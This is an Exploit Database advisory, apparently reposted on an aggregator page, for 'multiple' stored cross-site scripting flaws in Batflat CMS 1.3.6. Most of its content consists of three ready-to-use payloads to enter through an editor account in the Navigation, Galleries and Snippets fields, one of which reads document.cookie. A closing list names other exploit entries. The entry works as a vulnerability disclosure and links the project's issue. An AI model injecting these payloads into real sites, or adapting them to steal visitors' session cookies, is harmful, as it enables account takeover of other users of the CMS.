Batflat CMS 1.3.6 – ‘multiple’ Stored XSS

Exploit Database
14 阅读

作者： Tadjmen

日期： 2021-02-23
类别：
- webapps
平台：
- php
来源：https://www.exploit-db.com/exploits/49583/

# Exploit Title: Batflat CMS 1.3.6 - 'multiple' Stored XSS
# Date: 22/02/2021
# Exploit Author: Tadjmen
# Vendor Homepage: https://batflat.org/
# Software Link: https://github.com/sruupl/batflat/archive/master.zip
# Version: 1.3.6
# Tested on: Xammpp on Windows, Firefox Newest
# CVE : N/A

Multiple Stored XSS Cross-Site Scripting on Batflat CMS 1.3.6

Login with editor account with rights to Navigation, Galleries, Snippets

Navigation
- Add link
payload: "><img src=x onerror=alert(document.cookie)>

Galleries
- Add gallery
payload: mlem"><svg/onload=alert(1)>

Snippets
- Add Snippets
payload: mlem"><svg/onload=alert("TuongNC")>

More information:
https://github.com/sruupl/batflat/issues/105

last Exploits
Batflat CMS 1.3.6 – ‘multiple’ Stored XSS的更多信息

osCommerce 2.3.4.1 – ‘title’ Persistent Cross-Site Scripting：
WordPress Plugin Relevanssi – ‘category_name’ SQL Injection：
PHProjekt PhpSimplyGest v1.3. – Stored Cross-Site Scripting (XSS)：
NVMS 1000 – Directory Traversal：
Limny 3.0.1 – ‘login.php’ Script Cross-Site Scripting：
nodCMS – Cross-Site Request Forgery：
BMC Identity Management – Cross-Site Request Forgery：
WoWonder Social Network Platform 3.1 – Authentication Bypass：